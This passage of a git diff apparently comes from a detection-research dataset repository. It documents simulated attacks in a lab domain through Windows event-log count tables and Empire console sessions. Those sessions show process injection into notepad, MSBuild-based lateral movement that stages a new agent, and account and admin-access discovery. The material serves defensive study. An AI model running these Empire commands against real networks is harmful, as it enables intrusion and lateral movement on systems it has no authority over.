Authorization Policy Change | 9 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 9 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 8 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 8 | +| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 3 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 2 | +| Security | Microsoft-Windows-Security-Auditing | SAM | 2 | +| Security | Microsoft-Windows-Security-Auditing | Security Group Management | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 1442 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 538 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 408 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 257 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | CreateRemoteThread detected (rule: CreateRemoteThread) | 88 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 67 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 44 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 38 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 13 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 11 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 10 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 1711 | + +## Attacker Activity + +``` +(Empire: TKV35P8X) > usemodule management/psinject +(Empire: powershell/management/psinject) > set ProcName notepad +(Empire: powershell/management/psinject) > info + + Name: Invoke-PSInject + Module: powershell/management/psinject + NeedsAdmin: False + OpsecSafe: True + Language: powershell +MinLanguageVersion: 2 + Background: True + OutputExtension: None + +Authors: + @harmj0y + @sixdub + leechristensen (@tifkin_) + +Description: + Utilizes Powershell to to inject a Stephen Fewer formed + ReflectivePick which executes PS codefrom memory in a remote + process + +Comments: + http://sixdub.net + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + ProcId False ProcessID to inject into. + ProxyCreds False default Proxy credentials + ([domain\]username:password) to use for + request (default, none, or other). + Agent True TKV35P8X Agent to run module on. + Listener True https Listener to use. + ProcName False notepad Process name to inject into. + Proxy False default Proxy to use for request (default, none, + or other). + UserAgent False default User-agent string to use for the staging + request (default, none, or other). + +(Empire: powershell/management/psinject) > execute +[*] Tasked TKV35P8X to run TASK_CMD_JOB +[*] Agent TKV35P8X tasked with task ID 13 +[*] Tasked agent TKV35P8X to run module powershell/management/psinject +(Empire: powershell/management/psinject) > Job started: BELAKR +[*] Sending POWERSHELL stager (stage 1) to 10.0.10.103 +[*] New agent EMDBFPSY checked in +[+] Initial agent EMDBFPSY from 10.0.10.103 now active (Slack) +[*] Sending agent (stage 2) to EMDBFPSY at 10.0.10.103 + +(Empire: powershell/management/psinject) > agents + +[*] Active agents: + + Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener + ---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- + H3DKB8SA ps 172.18.39.106 HR001 SHIRE\nmartha powershell 5172 5/0.0 2019-05-18 20:06:25 https + TKV35P8X ps 172.18.39.106 HR001 *SHIRE\nmartha powershell 5452 5/0.0 2019-05-18 20:06:28 https + 56W8UEHP ps 172.18.39.106 HR001 SHIRE\nmartha cmd 8572 5/0.0 2019-05-18 20:03:49 https + + EMDBFPSY ps 172.18.39.106 HR001 SHIRE\nmartha notepad 7924 5/0.0 2019-05-18 20:06:28 https +``` \ No newline at end of file diff --git a/small_datasets/windows/defense_evasion/process_injection_T1055/empire_psinject.tar.gz b/small_datasets/windows/defense_evasion/process_injection_T1055/empire_psinject.tar.gz new file mode 100644 index 00000000..fd223689 Binary files /dev/null and b/small_datasets/windows/defense_evasion/process_injection_T1055/empire_psinject.tar.gz differ diff --git a/small_datasets/windows/defense_evasion/process_injection_T1055/reflective_dll_load/README.md b/small_datasets/windows/defense_evasion/process_injection_T1055/reflective_dll_load/README.md deleted file mode 100644 index 21b6deb2..00000000 --- a/small_datasets/windows/defense_evasion/process_injection_T1055/reflective_dll_load/README.md +++ /dev/null @@ -1,9 +0,0 @@ -# Reflective DLL Load - -Adversaries can reflectively load a DLL to enable additional functionalities to any process in the endpoint. - -## Technique Variations Table - -| RT Platform | Network | Dataset | Updated | -| ----------- | ------- | --------- | ------- | -| empire | shire | [empire_psinject](./empire_psinject.md) | 2019-03-19151711 | \ No newline at end of file diff --git a/small_datasets/windows/defense_evasion/process_injection_T1055/reflective_dll_load/empire_psinject.md b/small_datasets/windows/defense_evasion/process_injection_T1055/reflective_dll_load/empire_psinject.md deleted file mode 100644 index 029e63b3..00000000 --- a/small_datasets/windows/defense_evasion/process_injection_T1055/reflective_dll_load/empire_psinject.md +++ /dev/null @@ -1,92 +0,0 @@ - -# Empire Psinject - -An adversary can use Empire psinject to inject Unmanaged PowerShell into any process. This project is a reflective DLL based on Stephen Fewer's method. It imports/runs a .NET assembly into its memory space that supports the running of Powershell code using System.Management.Automation. - -## Technique(s) ID - -T1055 - -## Creators - -Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) - -## Dataset - -[empire_psinject.tar.gz](./empire_psinject.tar.gz) - -## Network Environment - -Shire - -## Time Taken - -2019-03-19151711 - -## About this file - -| log_name | source_name | task | record_number | -|------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| -| Windows PowerShell | PowerShell | Pipeline Execution Details | 2166 | -| Windows PowerShell | PowerShell | Provider Lifecycle | 16 | -| Windows PowerShell | PowerShell | Engine Lifecycle | 2 | -| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 240 | -| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 179 | -| Security | Microsoft-Windows-Security-Auditing | User Account Management | 149 | -| Security | Microsoft-Windows-Security-Auditing | Group Membership | 8 | -| Security | Microsoft-Windows-Security-Auditing | Logon | 8 | -| Security | Microsoft-Windows-Security-Auditing | Logoff | 7 | -| Security | Microsoft-Windows-Security-Auditing | Special Logon | 6 | -| Security | Microsoft-Windows-Security-Auditing | File Share | 2 | -| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 1 | -| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 1 | -| Security | Microsoft-Windows-Security-Auditing | Process Termination | 1 | -| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 1 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 293 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 225 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 217 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | CreateRemoteThread detected (rule: CreateRemoteThread) | 88 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 88 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 28 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 23 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 17 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 4 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 1 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 2115 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Execute a Remote Command | 1 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Named Pipe IPC | 1 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Starting Command | 1 | -| Microsoft-Windows-DNS-Client/Operational | Microsoft-Windows-DNS-Client | na | 373 | - -## Empire Activity - -``` -psinject https 8148 -``` - -``` -[*] Tasked G6BYHU4F to run TASK_CMD_JOB -[*] Agent G6BYHU4F tasked with task ID 6 -[*] Tasked agent G6BYHU4F to run module powershell/management/psinject -(Empire: G6BYHU4F) > Job started: 2AZBLF -[*] Sending POWERSHELL stager (stage 1) to 10.0.10.104 -[*] New agent MPB3UHD1 checked in -[+] Initial agent MPB3UHD1 from 10.0.10.104 now active (Slack) -[*] Sending agent (stage 2) to MPB3UHD1 at 10.0.10.104 - -(Empire: G6BYHU4F) > -(Empire: G6BYHU4F) > -(Empire: G6BYHU4F) > agents - -[*] Active agents: - - Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener - ---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- - 2MES3XN6 ps 172.18.39.105 IT001 SHIRE\pgustavo powershell 4312 5/0.0 2019-03-19 14:11:49 https - G6BYHU4F ps 172.18.39.105 IT001 *SHIRE\pgustavo powershell 9156 5/0.0 2019-03-19 14:11:50 https - MPB3UHD1 ps 172.18.39.105 IT001 *SHIRE\pgustavo cmd 8148 5/0.0 2019-03-19 14:11:47 https - - -(Empire: agents) > -``` \ No newline at end of file diff --git a/small_datasets/windows/defense_evasion/process_injection_T1055/reflective_dll_load/empire_psinject.tar.gz b/small_datasets/windows/defense_evasion/process_injection_T1055/reflective_dll_load/empire_psinject.tar.gz deleted file mode 100644 index 2dc65cca..00000000 Binary files a/small_datasets/windows/defense_evasion/process_injection_T1055/reflective_dll_load/empire_psinject.tar.gz and /dev/null differ diff --git a/small_datasets/windows/defense_evasion/trusted_developer_utilities_T1127/README.md b/small_datasets/windows/defense_evasion/trusted_developer_utilities_T1127/README.md new file mode 100644 index 00000000..c427b18c --- /dev/null +++ b/small_datasets/windows/defense_evasion/trusted_developer_utilities_T1127/README.md @@ -0,0 +1,9 @@ +# Trusted Developer Utilities + +There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering. These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application whitelisting defensive + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_invoke_msbuild](./empire_invoke_msbuild.md) | 2019-05-18213907 | \ No newline at end of file diff --git a/small_datasets/windows/defense_evasion/trusted_developer_utilities_T1127/empire_invoke_msbuild.md b/small_datasets/windows/defense_evasion/trusted_developer_utilities_T1127/empire_invoke_msbuild.md new file mode 100644 index 00000000..d4a1737a --- /dev/null +++ b/small_datasets/windows/defense_evasion/trusted_developer_utilities_T1127/empire_invoke_msbuild.md @@ -0,0 +1,173 @@ +# Empire Invoke Msbuild + +MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It takes XML formatted project files that define requirements for building various platforms and configurations. + +Adversaries can use MSBuild to proxy execution of code through a trusted Windows utility. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into the XML project file. Inline Tasks MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application whitelisting defenses that are configured to allow MSBuild.exe execution. + +## Technique(s) ID + +T1127 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_invoke_msbuild.tar.gz](./empire_invoke_msbuild.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18213907 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 796 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 8 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | +| System | Microsoft-Windows-Kernel-General | na | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 437 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 180 | +| Security | Microsoft-Windows-Security-Auditing | Removable Storage | 157 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 63 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 48 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 25 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 20 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 17 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 17 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 17 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 15 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 14 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 11 | +| Security | Microsoft-Windows-Security-Auditing | Other Policy Change Events | 8 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 6 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 4 | +| Security | Microsoft-Windows-Security-Auditing | File System | 2 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 1 | +| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 6 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 2667 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 1217 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 783 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 416 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 288 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 179 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File creation time changed (rule: FileCreateTime) | 45 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 37 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 25 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 22 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 15 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 4 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 660 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Execute a Remote Command | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Named Pipe IPC | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Starting Command | 1 | + +## Attacker Activity + +``` +(Empire: V6W3TH8Y) > usemodule lateral_movement/invoke_executemsbuild +(Empire: powershell/lateral_movement/invoke_executemsbuild) > info + + Name: Invoke-ExecuteMSBuild + Module: powershell/lateral_movement/invoke_executemsbuild + NeedsAdmin: False + OpsecSafe: False + Language: powershell +MinLanguageVersion: 2 + Background: False + OutputExtension: None + +Authors: + @xorrior + +Description: + This module utilizes WMI and MSBuild to compile and execute + an xml file containing an Empire launcher + +Comments: + Inspired by @subtee http://subt0x10.blogspot.com/2016/09 + /bypassing-application-whitelisting.html + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + UserName False UserName if executing with credentials + CredID False CredID from the store to use. + ComputerName True Host to target + DriveLetter False Drive letter to use when mounting the + share locally + ProxyCreds False default Proxy credentials + ([domain\]username:password) to use for + request (default, none, or other). + FilePath False Desired location to copy the xml file on + the target + Agent True V6W3TH8Y Agent to grab a screenshot from. + Listener True Listener to use. + Proxy False default Proxy to use for request (default, none, + or other). + UserAgent False default User-agent string to use for the staging + request (default, none, or other). + Password False Password if executing with credentials + +(Empire: powershell/lateral_movement/invoke_executemsbuild) > set ComputerName IT001.shire.com +(Empire: powershell/lateral_movement/invoke_executemsbuild) > set Listener https +(Empire: powershell/lateral_movement/invoke_executemsbuild) > execute +[>] Module is not opsec safe, run? [y/N] y +[*] Tasked V6W3TH8Y to run TASK_CMD_WAIT +[*] Agent V6W3TH8Y tasked with task ID 5 +[*] Tasked agent V6W3TH8Y to run module powershell/lateral_movement/invoke_executemsbuild +(Empire: powershell/lateral_movement/invoke_executemsbuild) > + +__GENUS : 2 +__CLASS : __PARAMETERS +__SUPERCLASS : +__DYNASTY : __PARAMETERS +__RELPATH : +__PROPERTY_COUNT : 2 +__DERIVATION : {} +__SERVER : +__NAMESPACE : +__PATH : +ProcessId : 6732 +ReturnValue : 0 +PSComputerName : + + + + +[*] Sending POWERSHELL stager (stage 1) to 10.0.10.103 +[*] New agent 38APWSR1 checked in +[+] Initial agent 38APWSR1 from 10.0.10.103 now active (Slack) +[*] Sending agent (stage 2) to 38APWSR1 at 10.0.10.103 + +(Empire: powershell/lateral_movement/invoke_executemsbuild) > agents + +[*] Active agents: + + Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener + ---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- + H3DKB8SA ps 172.18.39.106 HR001 SHIRE\nmartha powershell 5172 5/0.0 2019-05-18 21:39:49 https + TKV35P8X ps 172.18.39.106 HR001 *SHIRE\nmartha powershell 5452 5/0.0 2019-05-18 21:39:49 https + EMDBFPSY ps 172.18.39.106 HR001 SHIRE\nmartha notepad 7924 5/0.0 2019-05-18 21:39:47 https + + V6W3TH8Y ps 172.18.39.106 HR001 SHIRE\pgustavo powershell 5204 5/0.0 2019-05-18 21:39:50 https + 38APWSR1 ps 172.18.39.105 IT001 *SHIRE\pgustavo MSBuild 5656 5/0.0 2019-05-18 21:39:49 https + +(Empire: agents) > +(Empire: agents) > interact 38APWSR1 +(Empire: 38APWSR1) > shell whoami +[*] Tasked 38APWSR1 to run TASK_SHELL +[*] Agent 38APWSR1 tasked with task ID 1 +(Empire: 38APWSR1) > shire\pgustavo +..Command execution completed. + +(Empire: 38APWSR1) > +``` \ No newline at end of file diff --git a/small_datasets/windows/defense_evasion/trusted_developer_utilities_T1127/empire_invoke_msbuild.tar.gz b/small_datasets/windows/defense_evasion/trusted_developer_utilities_T1127/empire_invoke_msbuild.tar.gz new file mode 100644 index 00000000..bc800bbc Binary files /dev/null and b/small_datasets/windows/defense_evasion/trusted_developer_utilities_T1127/empire_invoke_msbuild.tar.gz differ diff --git a/small_datasets/windows/discovery/account_discovery_T1087/README.md b/small_datasets/windows/discovery/account_discovery_T1087/README.md new file mode 100644 index 00000000..6d430350 --- /dev/null +++ b/small_datasets/windows/discovery/account_discovery_T1087/README.md @@ -0,0 +1,11 @@ +# Account Discovery + +Adversaries may attempt to get a listing of local system or domain accounts. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_net_user](./empire_net_user.md) | 2019-03-19020729 | +| shire | [empire_net_user_domain](./empire_net_user_domain.md) | 2019-03-19021158 | +| shire | [empire_net_user_domain_specific](./empire_net_user_domain_specific) | 2019-05-18230446 | \ No newline at end of file diff --git a/small_datasets/windows/discovery/account_discovery_T1087/domain_users/README.md b/small_datasets/windows/discovery/account_discovery_T1087/domain_users/README.md deleted file mode 100644 index f5fc9d87..00000000 --- a/small_datasets/windows/discovery/account_discovery_T1087/domain_users/README.md +++ /dev/null @@ -1,9 +0,0 @@ -# Domain Users - -An adversary can enumerate all domain users - -## Technique Variations Table - -| RT Platform | Network | Dataset | Updated | -| ----------- | ------- | --------- | ------- | -| empire | shire | [empire_net_user_domain](./empire_net_user_domain.md) | 2019-03-19021158 | diff --git a/small_datasets/windows/discovery/account_discovery_T1087/empire_find_local_admin.md b/small_datasets/windows/discovery/account_discovery_T1087/empire_find_local_admin.md new file mode 100644 index 00000000..a83bd106 --- /dev/null +++ b/small_datasets/windows/discovery/account_discovery_T1087/empire_find_local_admin.md @@ -0,0 +1,136 @@ +# Empire Find Local Admin Access + +Finds machines on the local domain where the current user has local administrator access. It uses the OpenSCManagerW Win32API call to establish +a handle to the remote host. If this succeeds, the current user context has local administrator acess to the target. + +## Technique(s) ID + +T1087 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_find_local_admin.tar.gz](./empire_find_local_admin.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18224039 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 1100 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 40 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 9 | +| System | Service Control Manager | na | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 246 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 173 | +| Security | Microsoft-Windows-Security-Auditing | Removable Storage | 130 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 52 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 44 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 16 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 16 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 16 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 15 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 14 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 6 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 5 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 5 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 3 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 3 | +| Security | Microsoft-Windows-Security-Auditing | File System | 2 | +| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 290 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 214 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 146 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 145 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 48 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 39 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 6 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 986 | + +## Attacker Activity + +``` +(Empire: V6W3TH8Y) > usemodule situational_awareness/network/powerview/find_localadmin_access +(Empire: powershell/situational_awareness/network/powerview/find_localadmin_access) > info + + Name: Find-LocalAdminAccess + Module: powershell/situational_awareness/network/powerview/find_localadmin_access + NeedsAdmin: False + OpsecSafe: True + Language: powershell +MinLanguageVersion: 2 + Background: True + OutputExtension: None + +Authors: + @harmj0y + +Description: + Finds machines on the local domain where the current user + has local administrator access. Part of PowerView. + +Comments: + https://github.com/PowerShellMafia/PowerSploit/blob/dev/Reco + n/ + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + ComputerName False Hosts to enumerate, comma separated. + SearchScope False Specifies the scope to search under, + Base/OneLevel/Subtree (default of + Subtree) + ComputerSiteName False Search computers in the specific AD site + name, wildcards accepted. + Server False Specifies an active directory server + (domain controller) to bind to + Tombstone False Switch. Specifies that the search should + also return deleted/tombstoned objects. + ComputerOperatingSystem False Searches computers with a specific + operating system. Wildcards accepted. + ResultPageSize False Specifies the PageSize to set for the + LDAP searcher object. + ComputerDomain False Specifies the domain to query for + computers, defaults to the current + domain. + ComputerSearchBase False Specifies the LDAP source to search + through for computers + ServerTimeLimit False Specifies the maximum amount of time the + server spends searching. Default of 120 + seconds. + ComputerServicePack False Search computers with a specific service + pack + Agent True V6W3TH8Y Agent to run module on. + CheckShareAccess False Switch. Only display found shares that + the local user has access to. + ComputerLDAPFilter False Specifies an LDAP query string that is + used to search for computer objects. + +(Empire: powershell/situational_awareness/network/powerview/find_localadmin_access) > execute +[*] Tasked V6W3TH8Y to run TASK_CMD_JOB +[*] Agent V6W3TH8Y tasked with task ID 11 +[*] Tasked agent V6W3TH8Y to run module powershell/situational_awareness/network/powerview/find_localadmin_access +(Empire: powershell/situational_awareness/network/powerview/find_localadmin_access) > Job started: X3U8SY +HFDC01.shire.com +IT001.shire.com + +Find-LocalAdminAccess completed! + + +(Empire: powershell/situational_awareness/network/powerview/find_localadmin_access) > +``` \ No newline at end of file diff --git a/small_datasets/windows/discovery/account_discovery_T1087/empire_find_local_admin.tar.gz b/small_datasets/windows/discovery/account_discovery_T1087/empire_find_local_admin.tar.gz new file mode 100644 index 00000000..60930d57 Binary files /dev/null and b/small_datasets/windows/discovery/account_discovery_T1087/empire_find_local_admin.tar.gz differ diff --git a/small_datasets/windows/discovery/account_discovery_T1087/local_users/empire_net_user.md b/small_datasets/windows/discovery/account_discovery_T1087/empire_net_user.md similarity index 99% rename from small_datasets/windows/discovery/account_discovery_T1087/local_users/empire_net_user.md rename to small_datasets/windows/discovery/account_discovery_T1087/empire_net_user.md index 7b696c5a..27d64d3b 100644 --- a/small_datasets/windows/discovery/account_discovery_T1087/local_users/empire_net_user.md +++ b/small_datasets/windows/discovery/account_discovery_T1087/empire_net_user.md @@ -1,5 +1,4 @@ - -# Empire Net User +# Empire Net User Local An adversary can enumerate local users via the net.exe utility @@ -55,7 +54,7 @@ Shire | Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | | Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 110 | -## Empire Activity +## Attacker Activity ``` shell net user diff --git a/small_datasets/windows/discovery/account_discovery_T1087/local_users/empire_net_user.tar.gz b/small_datasets/windows/discovery/account_discovery_T1087/empire_net_user.tar.gz similarity index 99% rename from small_datasets/windows/discovery/account_discovery_T1087/local_users/empire_net_user.tar.gz rename to small_datasets/windows/discovery/account_discovery_T1087/empire_net_user.tar.gz index 2bd5b6d2..6ee86ef0 100644 Binary files a/small_datasets/windows/discovery/account_discovery_T1087/local_users/empire_net_user.tar.gz and b/small_datasets/windows/discovery/account_discovery_T1087/empire_net_user.tar.gz differ diff --git a/small_datasets/windows/discovery/account_discovery_T1087/domain_users/empire_net_user_domain.md b/small_datasets/windows/discovery/account_discovery_T1087/empire_net_user_domain.md similarity index 99% rename from small_datasets/windows/discovery/account_discovery_T1087/domain_users/empire_net_user_domain.md rename to small_datasets/windows/discovery/account_discovery_T1087/empire_net_user_domain.md index 457e4fd1..3e3b4c57 100644 --- a/small_datasets/windows/discovery/account_discovery_T1087/domain_users/empire_net_user_domain.md +++ b/small_datasets/windows/discovery/account_discovery_T1087/empire_net_user_domain.md @@ -1,5 +1,4 @@ - -# Empire Net User +# Empire Net User Domain An adversary can enumerate all users that belong to a domain via the net.exe utility @@ -49,7 +48,7 @@ Shire | Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 1 | | Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 93 | -## Empire Activity +## Attacker Activity ``` shell net user /domain diff --git a/small_datasets/windows/discovery/account_discovery_T1087/domain_users/empire_net_user_domain.tar.gz b/small_datasets/windows/discovery/account_discovery_T1087/empire_net_user_domain.tar.gz similarity index 100% rename from small_datasets/windows/discovery/account_discovery_T1087/domain_users/empire_net_user_domain.tar.gz rename to small_datasets/windows/discovery/account_discovery_T1087/empire_net_user_domain.tar.gz diff --git a/small_datasets/windows/discovery/account_discovery_T1087/empire_net_user_domain_specific.md b/small_datasets/windows/discovery/account_discovery_T1087/empire_net_user_domain_specific.md new file mode 100644 index 00000000..6ce06caf --- /dev/null +++ 